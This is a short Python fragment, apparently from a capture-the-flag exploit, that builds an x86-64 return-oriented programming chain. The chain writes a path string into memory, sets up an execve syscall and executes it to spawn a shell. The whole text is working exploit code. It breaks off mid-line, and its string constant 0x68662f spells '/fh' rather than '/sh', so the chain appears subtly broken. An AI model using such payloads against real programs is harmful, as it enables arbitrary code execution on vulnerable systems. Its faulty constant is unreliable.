payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4a4070)+p64(0x42242b)
# 0x000000000042242b: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x484ee4)
# 0x0000000000484ee4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4a4074)+p64(0x42242b)
# 0x000000000042242b: pop rax; ret; 
payload += p64(0x68662f)+p64(0x484ee4)
# 0x0000000000484ee4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x42242b)
# 0x000000000042242b: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4a4070)+p64(0x457089)
# 0x0000000000457089: pop rsi; ret; 
payload += p64(0x0)+p64(0x406783)
# 0x0000000000406783: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x45abeb)
# 0x000000000045abeb: syscall; ret; 
payload +=
